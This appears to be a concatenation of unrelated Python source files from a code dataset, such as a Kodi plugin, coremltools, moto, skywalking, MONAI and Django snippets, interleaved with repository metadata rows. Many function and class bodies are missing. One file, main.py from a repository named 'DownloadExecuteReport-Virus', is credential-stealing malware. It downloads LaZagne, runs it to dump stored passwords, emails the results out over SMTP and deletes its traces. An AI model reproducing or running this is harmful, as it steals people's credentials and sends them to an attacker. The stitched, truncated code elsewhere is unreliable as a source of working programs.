raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| 38.019011 | 116 | 0.633863 |
4c1ab77adfecf5628021417f2b5bb34c29a975d3 | 17,151 | py | Python | coremltools/converters/mil/frontend/tensorflow/converter.py | VadimLevin/coremltools | 66c17b0fa040a0d8088d33590ab5c355478a9e5c | ["BSD-3-Clause"] | 3 | 2018-10-02T17:23:01.000Z | 2020-08-15T04:47:07.000Z | coremltools/converters/mil/frontend/tensorflow/converter.py | holzschu/coremltools | 5ece9069a1487d5083f00f56afe07832d88e3dfa | ["BSD-3-Clause"] | null | null | null | coremltools/converters/mil/frontend/tensorflow/converter.py | holzschu/coremltools | 5ece9069a1487d5083f00f56afe07832d88e3dfa | ["BSD-3-Clause"] | 1 | 2021-05-07T15:38:20.000Z | 2021-05-07T15:38:20.000Z |
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import logging
from coremltools.converters.mil.input_types import (
InputType,
TensorType,
ImageType,
RangeDim,
_get_shaping_class,
)
from coremltools.converters.mil.input_types import Shape as InputShape
from coremltools.converters.mil.mil.var import Var
from coremltools.converters.mil.mil import get_new_symbol
from coremltools.converters.mil.mil.types.symbolic import is_symbolic
from coremltools.converters.mil.mil.types import is_tensor
from coremltools.converters.mil.mil import types
from .basic_graph_ops import topsort, simple_topsort
from .convert_utils import convert_graph
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import Program
from coremltools.converters.mil.mil import Function
from .ssa_passes.tf_passes import tensorflow_passes
from coremltools.converters._profile_utils import _profile
# TranscriptionContext maintains a map of tf_node.name --> ssa_var available
# to the current TF --> tfssa transcription.
| 41.527845 | 123 | 0.58329 |
4c1b595f4c6b8f77081c78b4858260e00facf459 | 4,420 | py | Python | pylinkcheck.py | clayball/pylinkcheck | 085e5562525bebc77b8ebfd3b0fb676b01f4be68 | ["MIT"] | null | null | null | pylinkcheck.py | clayball/pylinkcheck | 085e5562525bebc77b8ebfd3b0fb676b01f4be68 | ["MIT"] | null | null | null | pylinkcheck.py | clayball/pylinkcheck | 085e5562525bebc77b8ebfd3b0fb676b01f4be68 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2016 Clay Wells
#
# A Python-based link checker.
#
# Usage: pylinkcheck.py -r https://www.example.com
#
# By default, we can spider and check all of the links found at the URL's
# domain. For example, a check of https://foo.example.com will only check
# links with the base URL path of foo.example.com. Links found to
# bar.example.com will not be checked.
#
# Fancy run-time options
# url root (domain): this is simply required
# generate report file: -o output.txt, --output=output.txt
# limit depth: -l 2, --limit=2
# TODO: report format: --format=txt,html,xml
##############################################################################
import argparse
import urllib2
import csv
from datetime import datetime
import re
from urlparse import urlparse
from bs4 import BeautifulSoup
#######################################
# Functions
# Spider the base URL
# Print an informative summary of the dead links
#######################################
# Main program
#
# Get command line options
parser = argparse.ArgumentParser(description='A Python-based link checker.')
parser.add_argument('-f','--format', required=False, default='txt',
help='Output file format ')
parser.add_argument('-l','--limit', required=False, default=2,
help='Limit directory depth, example.com/limit/dir/depth/')
parser.add_argument('-u','--url', help='Base URL to check', required=True)
parser.add_argument('-o','--output', help='Output file name', required=False)
args = parser.parse_args()
# Assign program arguments to variables
# - we may want to add a '/' to baseurl if it's not present.
# - if the href links are relative we need to add the baseurl when checking
# the link.
baseurl = str(args.url)
pathlimit = int(args.limit)
# Show values
print 'Base URL: %s' % args.url
print 'Output file format: %s' % args.format
print 'Output file: %s' % args.output
print 'Limit spider: %d' % args.limit
# Grab today's date for timestamping output file.
now = datetime.now()
tstamp = now.strftime("%Y%m%d-%H%M")
# Grab all a href links
checkurl = urllib2.urlopen(baseurl).read()
soup = BeautifulSoup(checkurl, 'html.parser')
# Spider the site and build our list of URLs to check
spiderURL(baseurl, pathlimit)
deadlinks = []
# This for loop will completely change once the spiderURL function is working.
# We'll iterate over the various directory paths instead.
outofscope = 0
# Check the URLs
for link in soup("a"):
# Fetch the link but only return the status code
# hrefs are unpredictable; we can add a function to 'clean' them up, i.e.,
# get the proto, domain, path, file (TODO: for a complete solution we
# need to get all of this)
#if baseurl[:-1] == '/':
# print '[debug] strip last char from baseurl'
# mailto: is causing an error
href = link.get('href')
print '[debug] href: %s' % href
if re.match('^mailto', href):
# skip this one
continue
# Separate the file from the path
thisurl = urlparse(href)
if thisurl.netloc != baseurl and thisurl.netloc != '':
print '[-] HREF %s is out of scope' % thisurl.netloc
outofscope = 1
else:
print '[debug] path %s' % thisurl.path
outofscope = 0
# Build the full URL if the href is relative.
# - assuming, for now, other protocols are not desired
# - place this in the Spider function
try:
if re.match('^http', href):
checkurl = href
else:
checkurl = baseurl + href
except:
print '[-] Unknown error in re.match()'
try:
#print '[+] checking %s' % checkurl
hrefpage = urllib2.urlopen(checkurl)
except urllib2.HTTPError as e:
if e.code == 404:
print '[-] 404 ERROR: %s' % checkurl
# add this URL to deadlink list
deadlinks.append(checkurl)
else:
print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl)
except urllib2.URLError as e:
# Not an HTTP-specific error (e.g. connection refused)
    print '[-] NON-HTTP ERROR: %s - %s' % (e.reason, checkurl)
else:
print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl)
printReport(deadlinks)
# EOF
| 29.466667 | 78 | 0.671946 |
4c1d42a55dc8480f71e72b9866ed7b027a303687
| 34,975 |
py
|
Python
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 1 |
2021-12-12T04:23:06.000Z
|
2021-12-12T04:23:06.000Z
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 17 |
2020-08-28T12:53:56.000Z
|
2020-11-10T01:04:46.000Z
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 1 |
2021-07-06T22:44:47.000Z
|
2021-07-06T22:44:47.000Z
|
import logging
from abc import abstractmethod
import abc
import six
from collections import deque
from moto.dynamodb2.parsing.ast_nodes import (
UpdateExpression,
UpdateExpressionSetClause,
UpdateExpressionSetActions,
UpdateExpressionSetAction,
UpdateExpressionRemoveActions,
UpdateExpressionRemoveAction,
UpdateExpressionPath,
UpdateExpressionValue,
UpdateExpressionGroupedValue,
UpdateExpressionRemoveClause,
ExpressionPathDescender,
ExpressionSelector,
ExpressionAttribute,
ExpressionAttributeName,
ExpressionAttributeValue,
ExpressionValueOperator,
UpdateExpressionFunction,
UpdateExpressionAddClause,
UpdateExpressionAddActions,
UpdateExpressionAddAction,
UpdateExpressionDeleteAction,
UpdateExpressionDeleteActions,
UpdateExpressionDeleteClause,
)
from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression
from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer
class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin):
"""
Parser to create update expressions
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
def _parse(self):
"""
Update Expression is the top-most node therefore it is expected to end up at the end of the expression.
"""
while True:
self.skip_white_space()
if self.is_at_end():
logging.debug("End reached")
break
elif self._parse_by_a_subfactory():
continue
else:
self.raise_unexpected_token()
return self._create_node()
class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
class UpdateExpressionAttributeValueParser(ExpressionParser):
    pass  # class body truncated in this extract
| 33.597502 | 120 | 0.651237 |
4c1e3b72b32866f599c7e926ceb63efd29d9c600 | 5,332 | py | Python | dftbplus_step/tk_optimization.py | molssi-seamm/dftbplus_step | e5b9c7462d92c25fc6f27db5e4324b05bb42e224 | ["BSD-3-Clause"] | 1 | 2022-01-24T05:14:03.000Z | 2022-01-24T05:14:03.000Z | dftbplus_step/tk_optimization.py | molssi-seamm/dftbplus_step | e5b9c7462d92c25fc6f27db5e4324b05bb42e224 | ["BSD-3-Clause"] | 10 | 2020-12-16T21:36:37.000Z | 2022-03-17T01:53:54.000Z | dftbplus_step/tk_optimization.py | molssi-seamm/dftbplus_step | e5b9c7462d92c25fc6f27db5e4324b05bb42e224 | ["BSD-3-Clause"] | 1 | 2022-01-14T15:26:49.000Z | 2022-01-14T15:26:49.000Z |
# -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
| 32.120482 | 100 | 0.515941 |
4c1e5197c84f6ae0e879e45cf958dcfad6b26bdf | 7,000 | py | Python | console.py | aplneto/redes_projeto | 450ef8ac61e46bc38ff34142d07eda3d726ce326 | ["MIT"] | 1 | 2019-04-04T13:10:01.000Z | 2019-04-04T13:10:01.000Z | console.py | aplneto/redes_projeto | 450ef8ac61e46bc38ff34142d07eda3d726ce326 | ["MIT"] | null | null | null | console.py | aplneto/redes_projeto | 450ef8ac61e46bc38ff34142d07eda3d726ce326 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Mdulo de configurao dos consoles
"""
from Crypto.PublicKey import RSA
import socket
import os
import base64
| 32.110092 | 80 | 0.532143 |
4c1e5c9719ab7645023165c5beb655aadf6e00c7 | 4,988 | py | Python | sandbox/settings.py | OmenApps/marion | f501674cafbd91f0bbad7454e4dcf3527cf4445e | ["MIT"] | null | null | null | sandbox/settings.py | OmenApps/marion | f501674cafbd91f0bbad7454e4dcf3527cf4445e | ["MIT"] | null | null | null | sandbox/settings.py | OmenApps/marion | f501674cafbd91f0bbad7454e4dcf3527cf4445e | ["MIT"] | null | null | null |
"""
Django settings for marion project.
"""
from pathlib import Path
from tempfile import mkdtemp
from configurations import Configuration, values
BASE_DIR = Path(__file__).parent.resolve()
DATA_DIR = Path("/data")
# pylint: disable=no-init
| 30.230303 | 88 | 0.635525 |
4c1fe311f29bf7609a66d633ca361b9c555f8538 | 3,512 | py | Python | skywalking/client/grpc.py | cooolr/skywalking-python | 42176ff4b732000f2a75eac1affee2a681379df7 | ["Apache-2.0"] | null | null | null | skywalking/client/grpc.py | cooolr/skywalking-python | 42176ff4b732000f2a75eac1affee2a681379df7 | ["Apache-2.0"] | null | null | null | skywalking/client/grpc.py | cooolr/skywalking-python | 42176ff4b732000f2a75eac1affee2a681379df7 | ["Apache-2.0"] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
| 39.909091 | 110 | 0.768508 |
4c215b75166895f7437c7eb221fac00ff09ebb82 | 2,032 | py | Python | coingate/migrations/0004_auto_20200207_1959.py | glitzybunny/coingate_sandbox_payment | f5686964cdd6b7d65f9f37957da4b2cda6a02f63 | ["MIT"] | 2 | 2020-08-31T17:53:06.000Z | 2020-08-31T18:33:05.000Z | coingate/migrations/0004_auto_20200207_1959.py | glitzybunny/coingate_sandbox_payment | f5686964cdd6b7d65f9f37957da4b2cda6a02f63 | ["MIT"] | 5 | 2021-03-30T12:48:17.000Z | 2021-09-22T18:32:14.000Z | coingate/migrations/0004_auto_20200207_1959.py | glitzybunny/coingate_sandbox_payment | f5686964cdd6b7d65f9f37957da4b2cda6a02f63 | ["MIT"] | 1 | 2020-11-04T04:42:58.000Z | 2020-11-04T04:42:58.000Z |
# Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
| 38.339623 | 326 | 0.561024 |
4c219c1f42bd3a942209df9b52e42549c3b34e00 | 309 | py | Python | space_trace/__init__.py | SpaceTeam/space-event-trace | ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f | ["MIT"] | 2 | 2022-01-04T00:34:27.000Z | 2022-01-04T00:51:14.000Z | space_trace/__init__.py | SpaceTeam/space-event-trace | ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f | ["MIT"] | null | null | null | space_trace/__init__.py | SpaceTeam/space-event-trace | ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f | ["MIT"] | null | null | null |
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
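# config.toml is not included in this extract; illustrative (assumed) keys:
#   SQLALCHEMY_DATABASE_URI = "sqlite:///trace.db"
#   SECRET_KEY = "change-me"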
db = SQLAlchemy(app)
from space_trace import views, cli
| 18.176471 | 52 | 0.789644 |
4c228e2ac32c2ad15f711401f0894056b88a3776 | 1,388 | py | Python | ng/distributions/Distribution.py | forons/noise-generator | 033906165adaf6e620c03bf0b91f19b6d9890cf0 | ["MIT"] | null | null | null | ng/distributions/Distribution.py | forons/noise-generator | 033906165adaf6e620c03bf0b91f19b6d9890cf0 | ["MIT"] | null | null | null | ng/distributions/Distribution.py | forons/noise-generator | 033906165adaf6e620c03bf0b91f19b6d9890cf0 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from enum import Enum
from .NormalDist import NormalDist
from .UniformDist import UniformDist
| 42.060606 | 92 | 0.659942 |
4c22a7a412610e81fee1ef9b39c31356e4fa70c7 | 258 | py | Python | test/rename.py | Riteme/test | b511d6616a25f4ae8c3861e2029789b8ee4dcb8d | ["BSD-Source-Code"] | 3 | 2018-08-30T09:43:20.000Z | 2019-12-03T04:53:43.000Z | test/rename.py | Riteme/test | b511d6616a25f4ae8c3861e2029789b8ee4dcb8d | ["BSD-Source-Code"] | null | null | null | test/rename.py | Riteme/test | b511d6616a25f4ae8c3861e2029789b8ee4dcb8d | ["BSD-Source-Code"] | null | null | null |
import os
import sys
filename = sys.argv[1]
from_id = int(sys.argv[2])
to_id = int(sys.argv[3])
for i in range(from_id, to_id + 1):
    os.system("mv {0}.in{1} {0}{1}.in".format(filename, i))
    os.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
| 23.454545 | 62 | 0.624031 |
4c237eab0c099d5c3321cd95e513399431effe30 | 668 | py | Python | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | ["MIT"] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | ["MIT"] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | ["MIT"] | 4 | 2020-05-27T10:02:31.000Z | 2021-07-11T08:14:20.000Z |
from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
]
| 39.294118 | 117 | 0.754491 |
4c23f93517014abc612473feea3755466fd55cec | 683 | py | Python | dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py | kozo2/dash-docs | 5140cfd1fda439233e8b95e2443332a32a2453f5 | ["MIT"] | 1 | 2021-04-11T03:08:43.000Z | 2021-04-11T03:08:43.000Z | dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py | kozo2/dash-docs | 5140cfd1fda439233e8b95e2443332a32a2453f5 | ["MIT"] | null | null | null | dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py | kozo2/dash-docs | 5140cfd1fda439233e8b95e2443332a32a2453f5 | ["MIT"] | null | null | null |
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
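# The callback wiring the textarea to the output div is truncated in this
# extract; a minimal reconstruction (assumed from the imports and ids above):
@app.callback(
    Output('textarea-example-output', 'children'),
    [Input('textarea-example', 'value')]
)
def update_output(value):
    return 'You have entered: \n{}'.format(value)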
if __name__ == '__main__':
app.run_server(debug=True)
| 26.269231 | 76 | 0.682284 |
4c2449756d626addb11627279707eb2913ce92ba | 490 | py | Python | tests/test_wrapped_driver.py | balexander85/wrapped_driver | 2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1 | ["MIT"] | null | null | null | tests/test_wrapped_driver.py | balexander85/wrapped_driver | 2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1 | ["MIT"] | null | null | null | tests/test_wrapped_driver.py | balexander85/wrapped_driver | 2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1 | ["MIT"] | null | null | null |
import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| 28.823529 | 64 | 0.763265 |
4c244af15987164d1a6b58af8468dc053923ce6d | 470 | py | Python | eth/vm/forks/petersburg/blocks.py | ggs134/py-evm | 5ad87356181b03c14a2452131f50fe8762127c84 | ["MIT"] | 1,641 | 2017-11-24T04:24:22.000Z | 2022-03-31T14:59:30.000Z | eth/vm/forks/petersburg/blocks.py | ggs134/py-evm | 5ad87356181b03c14a2452131f50fe8762127c84 | ["MIT"] | 1,347 | 2017-11-23T10:37:36.000Z | 2022-03-20T16:31:44.000Z | eth/vm/forks/petersburg/blocks.py | ggs134/py-evm | 5ad87356181b03c14a2452131f50fe8762127c84 | ["MIT"] | 567 | 2017-11-22T18:03:27.000Z | 2022-03-28T17:49:08.000Z |
from rlp.sedes import (
CountableList,
)
from eth.rlp.headers import (
BlockHeader,
)
from eth.vm.forks.byzantium.blocks import (
ByzantiumBlock,
)
from .transactions import (
PetersburgTransaction,
)
| 20.434783 | 61 | 0.697872 |
4c249535bfee369b506769f07912c622ac79fe51 | 5,107 | py | Python | tests/runner.py | crnbaker/MONAI | a4b1144efdc27b197410033ae08bd587c8a1634a | ["Apache-2.0"] | 1 | 2020-12-03T21:28:09.000Z | 2020-12-03T21:28:09.000Z | tests/runner.py | crnbaker/MONAI | a4b1144efdc27b197410033ae08bd587c8a1634a | ["Apache-2.0"] | null | null | null | tests/runner.py | crnbaker/MONAI | a4b1144efdc27b197410033ae08bd587c8a1634a | ["Apache-2.0"] | 1 | 2020-06-11T13:03:02.000Z | 2020-06-11T13:03:02.000Z |
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import inspect
import os
import sys
import time
import unittest
from monai.utils import PerfContext
results: dict = dict()
if __name__ == "__main__":
loader = unittest.TestLoader()
default_pattern = get_default_pattern(loader)
# Parse input arguments
args = parse_args(default_pattern)
# If quick is desired, set environment variable
if args.quick:
os.environ["QUICKTEST"] = "True"
# Get all test names (optionally from some path with some pattern)
with PerfContext() as pc:
tests = loader.discover(args.path, args.pattern)
discovery_time = pc.total_time
print(f"time to discover tests: {discovery_time}s")
test_runner = unittest.runner.TextTestRunner(
resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast
)
# Use try catches to print the current results if encountering exception or keyboard interruption
try:
test_result = test_runner.run(tests)
print_results(results, discovery_time, args.thresh, "tests finished")
sys.exit(not test_result.wasSuccessful())
except KeyboardInterrupt:
print_results(results, discovery_time, args.thresh, "tests cancelled")
sys.exit(1)
except Exception:
print_results(results, discovery_time, args.thresh, "exception reached")
raise
| 35.22069 | 118 | 0.662033 |
4c25af4aec5e8d2b72efcbe5e7b1a661e7cc9946 | 963 | py | Python | venv/Lib/site-packages/pandas/core/array_algos/transforms.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | ["MIT"] | null | null | null | venv/Lib/site-packages/pandas/core/array_algos/transforms.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | ["MIT"] | null | null | null | venv/Lib/site-packages/pandas/core/array_algos/transforms.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | ["MIT"] | null | null | null |
"""
transforms.py is for shape-preserving functions.
"""
import numpy as np
| 24.692308 | 82 | 0.599169 |
4c2609dfb8072ffe05951ef05454ba700de01952 | 789 | py | Python | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | ["MIT"] | 1 | 2020-03-02T20:55:04.000Z | 2020-03-02T20:55:04.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | ["MIT"] | 6 | 2020-06-05T17:18:41.000Z | 2022-03-11T23:14:47.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | ["MIT"] | null | null | null |
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
| 29.222222 | 94 | 0.64512 |
4c263e5689af5df6e8fbc9a6cee80e41efe505e2 | 2,319 | py | Python | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | ["MIT"] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | ["MIT"] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | ["MIT"] | null | null | null |
from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
| 32.661972 | 108 | 0.639069 |
4c26b67f1983ed6d013acb44413f671a2be21260
| 7,534 |
py
|
Python
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 12 |
2019-08-01T06:16:17.000Z
|
2021-04-16T20:00:02.000Z
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 5 |
2020-09-27T12:03:24.000Z
|
2021-08-06T18:01:32.000Z
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 4 |
2019-08-20T17:49:27.000Z
|
2022-03-27T16:39:10.000Z
|
# coding: utf-8
# Copyright 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Action Service
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
OpenAPI spec version: v1beta2.12 (recommended default)
Generated by: https://openapi-generator.tech
"""
from requests import Response
from string import Template
from typing import List, Dict
from splunk_sdk.base_client import handle_response
from splunk_sdk.base_service import BaseService
from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel
from splunk_sdk.action.v1beta2.gen_models import Action
from splunk_sdk.action.v1beta2.gen_models import ActionMutable
from splunk_sdk.action.v1beta2.gen_models import ActionResult
from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail
from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey
from splunk_sdk.action.v1beta2.gen_models import ServiceError
from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
| 37.1133 | 177 | 0.668835 |
4c26e9b14a57dad62c0722a56d9cd088844722fb
| 97 |
py
|
Python
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3 |
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23 |
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
| 13.857143 | 37 | 0.731959 |
4c2897e16dece2ba4ecd2dbef042a4f90f011294
| 786 |
py
|
Python
|
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("[email protected]", "yourpassword", result)
os.remove("lazagne.exe")
| 24.5625 | 97 | 0.720102 |
4c2951c766fe0cde976ee8004540518c1924599a
| 113 |
py
|
Python
|
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
from SmartAPI.rdf.List import List
| 16.142857 | 34 | 0.699115 |
4c2a0b02facefb7ade979ad8ea41989718dd6e87
| 13,974 |
py
|
Python
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 3 |
2021-10-03T23:11:24.000Z
|
2021-10-04T12:14:56.000Z
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 7 |
2019-10-15T20:51:36.000Z
|
2020-02-27T18:25:26.000Z
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 1 |
2020-09-30T11:23:55.000Z
|
2020-09-30T11:23:55.000Z
|
##################################################################################################
# Copyright (c) 2012 Brett Dixon
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
